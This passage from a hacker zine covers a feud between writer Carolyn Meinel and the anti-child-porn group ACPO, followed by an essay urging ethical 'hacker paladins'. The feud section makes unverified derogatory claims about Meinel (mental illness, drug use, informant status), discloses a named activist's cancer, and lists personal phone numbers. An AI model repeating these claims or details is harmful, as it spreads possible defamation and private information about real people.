Apparently this did not sit well with Carolyn. Did she fear that
she would be caught? I do not know, I do know that her
reply seemed to foam from the mouth much in the same way that
would cause a veterinarian to put down a dog for fear of rabies.
>From: Carolyn Meinel <cmeinel@techbroker.com>
>
>First, my apologies if Mr. Stead's email was forged by an enemy of your
>organization. If it was forged, please ignore the rest of this email
>Hacking is not a crime. I'm surprised that even after treading my attempt
to
>
>help you with this, that you still insist it is crime.
>Everywhere my web site upholds legal behavior and insults and attacks
>criminal actions. I take offense at your suggestion that I commit crime
>("hope you never get caught"). Before you accuse anyone of computer
crime,
>especially anyone who crusades against computer crime, you ought to
consult
>first with your conscience, and secondly with a lawyer.
>The whole point of proper use of the English language is to keep
definitions
>
>the same. When you and your associates try to redefine hacking, and in
>particular white hat hacking, as crime, you libel those who have never
>broken the law such as predator-hunter.com, which use hacking skills to
>assist and train law enforcement. (We at happyhacker.org have also helped
>train law enforcement.)
>You say you used to work with white hat hackers. Either they were really
>white hats, and did not break the law, or they broke the law and should
>therefore be called black hats. If you were using criminal services, your
>organization is guilty of crime.
>If you were using the white hat term in the normal sense (AKA the Lone
>Ranger), then you are treating your volunteers unfairly and may be in
danger
>
>of prosecution for libel.
>Either way, you are in trouble. Any organization that works with law
>enforcement should be doubly careful to avoid breaking the law. It's also
>not wise to accuse a journalist who writes approximately one popular book
>per year of committing crime.
>Unless I get a REALLY good explanation of what you people are up to, I
will
>move your group from happyhacker.org/defend/ to happyhacker.org/sucks/ .
>Your group will join Se7en's crusade in my upcoming book as an example of
>the hazards of Internet groups that claim to fight kiddie porn.
>Given the seriousness of your accusations against your volunteers and me,
if
>
>we communicate further, it should be via phone. Please call me at
>505-281-9675 if this was really your email.
If memory serves, There are some questions as to the legality of
carolyn's actions.
http://www.attrition.org/shame/www/investigated.html
And then there is plagiarism (not good for a world-class author like
Carolyn)
http://www.attrition.org/shame/www/bo-cm.plag.01.html
And then again, there is the slander and libel (even before ACPO)
http://www.attrition.org/slander/
And then there is drug use:
http://www.attrition.org/shame/www/drugs.001.html
Perhaps this explains 'Happy Hacker'. Humm.
Should I go on?
Now, where was I? Ahh. After this little letter, Doug called Carolyn.
In part to find out what was going on, and also with concern that in
her mental state was degrading and that she may do something to harm
herself.
Unfortunately.. um, we don't have a carbon copy of that phone call.
After the phone call, Doug sent this email out:
>
>Hello,
>
>I just got off the phone with one Carolyn Menial, whom is very upset
>with me for my putting the words hacker and criminal together in the
>same sentence. She was really upset, and at times almost incoherent.
>She did not like my 2nd email to her any better and did not consider
>it a suitable apology. Albeit, I don't think I have anything to
>apologies for, she never the less hung up on me after about 5 minuets
>of listening to her rant and rave.
>
>I suspect there is something else going on here, she claims death
>threats have been made against her and that she and her organization
>have been the target of millions of dollars worth of damage done my
>cyber attacks by "computer criminals". Extreme paranoia combined with
>a large dollop of persecution together with a very aggressively
>defensive posture.
>
>I suspect that I and perhaps ACPO have not herd the last of this
>person. She claims to be a forensic computer professional, a book
>writer and with powerful connections. I would not be at all surprised
>to see her attack the ACPO organization on her web site and in any
>book she may publish. Certainly well beyond any reasonable action,
>even if I had indeed slandered or liable her.
>
>This is of course not the case, as my original email was not broadcast
>to anyone, even the BoD of ACPO and went instead directly back to her
>as a reply to her email.
>
>Cheers, and who said this would be easy, or that there was any common
>about common sense!
>
>Doug
Now, Carolyn -- not to be out done -- decided to direct her
angst against the world to Doug and ACPO. Most recently on her
site is this recent tirade against ACPO and Doug. Interestingly
enough, four of her seven paragraphs are directly dealing with
Doug -- the director who tried to gently tell her to go
do something with herself -- and likely also gave a few
suggestions on how to do it.
Now, to address the issues and slander on her webpage:
>Antichildporn.org <http://antichildporn.org/> disintegrating!
>
>Founder and leader Natasha Grigori has, according to their web site,
>taken a leave of absence for unspecified medical reasons. Their
>webmaster has quit. According to our sources, she quit when she realized
>she was being exploited. The remainder of Antichildporn.org is trying to
>cover it up.
First, Natasha Grigori has taken a leave of absence for medical reasons.
She will be at defcon this year, yes. Those who know her and know
of her situation also know that this may be her last defcon. Unfortunately
her cancer has progressed beyond what may be treated.
It is rare to find an individual willing to campaign with
such passion on an issue as Natasha Grigori. At times it is her
anger and hate of those who abuse children, much in the
same way as she was abused, that keeps her going. Yes hate
is powerful, and sometimes it will keep us going long after
everything else has failed.
>The former webmaster of the ACPO resigned to due time
>constraints and an inability to continue to volunteer their services -
>nothing more. A new webmaster has since volunteered and taken over
>administration of the website.
>
>A Federal investigation is rumored to be in progress. It happens to be
>child sexual abuse to recruit children to troll the Web for porn and
>report instances of kiddie porn. In the case of Antichildporn.org, these
>children were not even reporting kiddie porn to the authorities.
>Instead, they report directly to a form on the Antichildporn.org web
>site. <http://www.antichildporn.org/reporting.cfm>Under questioning,
>the leaders of Antichildporn.org were unable to cite a single instance
>of actual prosecutions arising from these reports.
ACPO is unaware of any ongoing investigation, although considering
Meinel's status as a confidential FBI informant (listed status "MI" and
"PS", "MI" indicating that she suffers from a mental or emotional
dysfunction, and that all information must be scrutinized as such
(for more on her mental dysfunction, see
http://www.attrition.org/shame/www/wacko.001.html),
"PS" indicating that she is a Probable Suspect -
http://www.antionline.com/cgi-bin/News?type=antionline&date=07-26-1999&s
tory=Route.news), she may be trying to have one started - although the
following quote probably sums up how seriously the FBI would take her
accusations:
"That bitch calls me every single fucking day. That chick is nuts.
I'm afraid to even answer my phone anymore." -- Washington, D.C.
FBI Agent Mike Bellis talking about Carolyn Menial -
(http://www.genocide2600.com/~tattooma/quotes.txt).
While Meinel correctly states that it is "child sexual abuse to recruit
children to troll the web for porn", the ACPO does nothing of the sort.
Meinel knows this, which is why the accusation is implied. In fact, in
the liaison job description posted plainly on the ACPO website @
http://www.antichildporn.org/liaison.cfm, it is specifically stated that
liaisons are _not_ asked to locate child pornography.
There is a form that exists on the ACPO website to report instances of
child
pornography, however, contacting the authorities is encouraged, the form
simply facilitates a means by which child pornography can be reported by
those wishing to maintain their anonymity, and instances of child
pornography reported to the ACPO are given to the proper authorities.
>Who the heck are these guys? Natasha is an alias. According to our
>sources, she is well-meaning, but naive. Most of the rest of the
>AntiChildPorn points of contact use aliases. Doug Stead, who is listed
>as their "Vice Chairperson," was careless enough to leave a message on
>Carolyn Meinel's answering machine in which he claimed to be "The
>director" (not even "a" director) "of the International Society for
>Policing Cyberspace <http://www.polcyb.org/>." Of course, as a reporter,
>I (Carolyn) am saving that tape.
Natasha is an alias. After being abused by her father, she changed
her name, though not through the legal system, rather then
carry the mantel as a reminder of the horrors she survived.
Doug Stead is on the Board of Directors for the International Society
for Policing Cyberspace, and is plainly listed on the directors page of
the International Society for Policing Cyberspace as such
(http://www.polcyb.org/directors.html) .
A much more interesting question is 'Who the heck is Carolyn Meinel,
and what would possess her to libel and attack an organization
that wants to end child pornography and identify pedophiles?'
http://www.attrition.org/shame/index2.html
http://www.pervertedlogic.com/pserv/old/meinel.htm
http://www.dis.org/shipley/cpm/
http://www.dhp.com/~fyodor/meinelfraud.txt
>Since he was not listed on the Society for Policing Cyberspace
><http://www.polsci.org/> web site,
www.polsci.org is not the website for the organization being discussed,
www.polcyb.org is - in fact, the domain polsci.org isn't even
registered.
$ whois polsci.org
[whois.crsnic.net]
Whois Server Version 1.3
Domain names in the .com, .net, and .org domains can now be registered
with many different competing registrars. Go to http://www.internic.net
for detailed information.
No match for "POLSCI.ORG".
Again, I am amazed at her UberHaxor Happy Hacking skills -- able
to find sites that don't even exist.
> I spoke with him over the phone (604-527-1100) to try to clear up the
>problem. He directed me to <http://polcyb.org/>, the same site I had
>been look at, which claims to represent that organization. He said it
>was, in fact, the web site of the organization he claims to direct."Just
>phone them, they'll vouch for me," he said.
As previously mentioned, Doug Stead is plainly listed on the Directors
page of the site Meinel mentions (as Douglas Stead) she "had been look
at".
Since Meinel obviously won't take the time to proofread her own story,
one wonders how much time (if any) was spent investigating the credibility
of her "sources".
>I phoned one of the people listed there as a director, Phil Ortega, CEO
>of World net Technologies. He has never heard of Stead. And Stead is not
>listed anywhere on their web site.
Stead is listed on the website, but there is no mention of a Phil
Ortega on the website. Meinel's claims are so inaccurate one must wonder
whether she even looked at the sites being discussed or has fabricated
these claims as a result of her documented mental issues.
>I have asked around the computer forensics community. They have never
>heard of Stead. I asked Stead for his credentials in forensics. He first
>gave out the name of some university, then backpedaled and said he was
>not a forensics person.
Doug Stead never claimed to be a member of the forensics community.
He has provided support to bring RCMPs to training and confrerences.
Doug Stead has also spoken at some of these confrences.
Doug Stead is the President of EAP (Entrapaunres against Pedophilia)
Doug Stead is the Owner of Tri-M Systems.
Others members of the board at the time are involved in the forensics
community. This includes Don Withers
http://www.google.com/search?hl=en&safe=off&q=%22Don+Withers%22+%2BForensics
and Al Wiinikainen
http://www.hightechcrimecops.org/advisory.htm
http://www.goldcrew.com/
>Are any of those people at AntiChildPorn for real? Will they someday
>turn up on our Busted! <../crime/busted.shtml> page? We hope SOMETHING
>will happen to set an example -- adults shouldn't recruit children to
>sift through porn sites for them.
Carolyn Meinel for real?
Will she someday turn up on numerous web pages exposing her as an
unstable charlatan?
She already has.
In the War against child pornography and child abuse by pedophiles,
the enemy of my enemy is my friend. Conversely, my enemies are
friends of my enemy.
[Love's Freedom]=======================================================[Raschid]
"Do not conform any longer to the pattern of this
world, but be transformed by the renewing of your
mind."
-Romans 12:2
In the last issue of Keen Veracity (Issue 10) I
discussed the purpose of Warzael Zarcae, and the need
for a new class of hacker: the paladin. I have also
discussed in general terms what type of individual
this new rank would take, in lectures delivered and in
personal discussions. Zarcae's ideas have always been
clear on what sort of person this paladin should be:
wise in knowledge, gentle in carrying out his
understanding, and above all, joyous with his zeal for
high living. Legalism (the idea of slavishly following
a set of rules) is the antithesis to the right state
of mind for the hacker paladin. Instead, we should so
order our lives that rules aren't necessary; doing the
good is as natural to us as breathing. Obedience to
the higher moral law ought to be a joy; not because we
expect to receive anything from it, but because we
enjoy the action itself.
Consider: When a man is in love with someone, he
doesn't perform actions simply to garner favor. If he
did that, then his relationship wouldn't be worth much
(or last long; people aren't as stupid as they
appear). We do actions in love because it is a joy and
a blessing for us to do so. In the same way, our
duties as Zarcadians should be carried in out full
happiness, come what may. Even if our endeavors lead
to our persecution and capture by government
authorities, be of good cheer! You're serving a higher
cause; history will judge you not as criminals, but as
the leaders of the moral revolution in the
underground. Eventually, even authorities will come to
realize that not all of us are evil, and out for
destruction.
We have this treasure in jars of clay to show that
this all-surpassing power is from God and not from us.
We are hard pressed on every side, but not crushed;
perplexed, but not in despair; persecuted, but not
abandoned; struck down, but not destroyed.'
-Corinthians (I) 4:7-9
Daily let us should lift our hands in benediction and
happiness that it has fallen to our shoulders to work
this marvelous revolution in the underground. We are
the ones shouting in joy, waving our arms at our
brethren to join us, sounding the call to battle
against the Dark. We, weak vessels of mud and filth,
have been given this beautiful chance to wipe clean,
and by our cleanliness, to become an example to the
underground of what true goodness is. Let us bless
daily all those who have sneered to our faces, members
who've apostatized our ethics, and everyone who has
ever read our papers, heard a Zarcadian lecture, and
mocked heartily our beliefs. It is these people who
most need to hear a message of hope for the
underground; we are no longer living in bondage, but
singing in the full daylight, songs of joy, and
unending praise.
What type of man is this new hacker paladin? The best
example is hundreds of years old, in a old, old story:
A knight there was, and he a worthy man,
Who, from the moment that he first began
To ride about the world, loved chivalry,
Truth, honor, freedom and all courtesy".
-Geoffrey Chaucer, "The Canterbury Tales"
Our joy should be in doing right; we should be so
pre-occupied with honoring others that we have no time
for our own avarice, and misdeeds.
"Finally brothers, whatever is true, whatever is
noble, whatever is right, whatever is pure, whatever
is lovely, whatever is admirable-if anything is
excellent and praiseworthy- think about such things."
-Philippians 4:8
Our minds ought to be occupied be higher things; with
love rather than consuming hatred; justice for the
poor rather than concern over our own finances, and
with how much *we* are making. Think about it: in the
underground as it stands, how many of us are devoured
by our lusts for vice, and our love of perversion?
Most hackers I know would rather download porn than
music, and would rather curse one another than say
anything worthwhile. We complain that the world has no
respect for us; what have we done to deserve it? We
claim in magazines that we're the ^Ñelite', that we
represent a new order to things. From this humble
writer's perspective, it only seems we're a new
wrinkle on an old, old face. Other than malicious
pranks, we as a people haven't made any sort of
significant impact on the world, other than to be a
handy boogeyman for government military types and law
enforcement to justify increasing their budgets with.
If you're a hacker currently engaging in dark
enterprises, consider! The consequences of your action
don't just extend to yourself (getting caught) but
extend to every hacker in the world. For every one of
us engaged in evil, the honorable name of "hacker"
grows a little dimmer every time. Already the word
"virtue" to the underground as a whole is a flickering
candle, soon to be gutted. Do you want it said that
you were the final puff of wind that blew it out? Turn
your ways. Accept your duty. Learn to do good, and
combat evil. For every hacker engaged in the good, our
name grows a little brighter, and the dream of an
underground concerned with worthwhile, honorable
endeavors draws a bit nearer.
Many government officials will not understand you,
should you turn your ways. Good or evil, they will see
only a computer hacker, born and bred to spread chaos.
As I said in "Hacker Paladins"; though they will
persecute you, do not strike maliciously at sworn
agents of justice. We fight, them and us, on the same
side: to protect the masses, and guard them from those
who would exploit and perform savagery. The proper
attitude for a paladin to take regarding persecution
is found in the poetry of Richard Lovelace:
"Stone walls do not a prison make
Nor iron bars a cage;
Minds quiet and innocent take
That for a hermitage;
If I have freedom in my love
And in my soul am free
Angels alone, that soar above,
Enjoy such liberty.'
-"To Althea, In Prison"
We are free in many ways; free to love whomever we
choose, free to follow our faith; free to hope in a
better world to come. Yet there are so many ways in
which we are not free: we are not free from our lusts,
our sick desires, and our despair in our own inherent
dark hearts. How can we shun this bane, and learn to
walk as we ought? By being servants of the High,
rather than the lords of destruction that the world
sees as us. Better a servant in Heaven than a lord of
Hell.
What type of love should paladins practice? To answer
this, we turn to examning the Romantic-era Christian
mystic Robert Blake:
"Love seeketh not itself to please
Nor for itself hath any care,
But for another gives its ease,
And builds a Heaven in Hell's despair.'
So sung a little clod of clay,
Trodden with the cattle's feet,
But a pebble of the brook
Warbled out these meters meet:
Love seeketh only self to please
To bind another to its delight
Joys in another loss of ease,
And builds a Hell in Heaven's despite.'"
The two philosophies contained in the poem (the
clay's self-sacrifice, humility and compassion
contrasted with the pebble's hatred, sadism,
selfishness and pride) are the two forces battling in
the underground. Most hackers become such not out of
any joy they gain in technical knowledge, but craving
the respect they feel they'll get from wreaking havoc
on innocents. Even when confronted with the damage
they cause, most darksider hackers look at you
blankly, and ask in bewilderment what this has to do
with them, and can you please step away from their
keyboard? This is stupidity, and a total lack of
empathy. Many others enjoy using their skills to
deliberately hurt people; not for a political cause,
not for any real reason, but simply because they can.
It is against this element that a small force of
virtuous honorable men will arise ni every generation,
in every sub-culture, to combat, and withstand.
It is the clay's philosophy that Zarcadians must
always strive to keep close, and the pebble's
philosophy which we must forever fight again.
Until next we meet, brothers and sisters, Godbless.
-Raschid
*Founder of Warzael Zarcae
**You can contact Raschid at cogitoesum@yahoo.com;
read Zarcae's works at www.hackedarchives.com, or come
join us in #zarcae on undernet on IRC!**
--------------------------------------------------------------------------------
S U B M I T T O K E E N V E R A C I T Y
--------------------------------------------------------------------------------
NO! You do not have to be a member of Legions of the Underground to submit to
KV. You can be a member of something else! Nobody is perfect! If you have a idea
and would like to toss it out in the wind for general discussion, or maybe you
are researching something and you just want feedback, KV is a great way to get
your ideas out in the open. We at Legions of the Underground are not prejudice
in any way shape or form, so even a AOLer's article may be published if it seems
that it has clue. Or then again, maybe hell will freeze over! Anyones stuff
maybe published, but we will never know if you don't submit! So get to writing.
Because what you don't know can kill you! Legions of the Underground is a
equal opportunity destroyer.
--------------------------------------------------------------------------------
All submissions to: submit@legions.org
--------------------------------------------------------------------------------
IRC: Undernet #legions
MUD: Sensenet.legions.org 5555 - The Best in Star Wars Reality Mudding
--------------------------------------------------------------------------------
O F T E N I M I T A T E D N E V E R D U P L I C A T E D
--------------------------------------------------------------------------------
L E G I O N S O F T H E U N D E R G R O U N D
n :.
E% ___ _______ ___ ___ :"5
z % | | (_______) | | | | :" `
K ": | | | | | | | | | | z R
? %. | | | | | | | | | | :^ J
". ^s | |___ | |___| | | |___| | f :~
'+. #L |_____| \_____/ \_____/ z" .*
'+ %L z" .~
": '%. .# +
": ^%. .#` +"
#: "n .+` .z"
#: ": www.legions.org z` +"
%: `*L z" z"
*: ^*L z* .+"
"s ^*L z# .*"
#s ^%L z# .*"
#s ^%L z# .r"
#s ^%. u# .r"
#i '%. u# .@"
#s ^%u# .@"
#s x# .*"
x#` .@%.
x#` .d" "%.
xf~ .r" #s "%.
u x*` .r" #s "%. x.
%Mu*` x*" #m. "%zX"
:R(h x* "h..*dN.
u@NM5e#> 7?dMRMh.
z$@M@$#"#" *""*@MM$hL
u@@MM8* "*$M@Mh.
z$RRM8F" [knowledge is key] "N8@M$bL
5`RM$# 'R88f)R
'h.$" #$x*
--------------------------------------------------------------------------------
All mention of LoU, Legions of the Underground, Legions, KV, or Keen Veracity,
copyright (c) 2000-2001 legions.org, all rights reserved.
--------------------------------------------------------------------------------
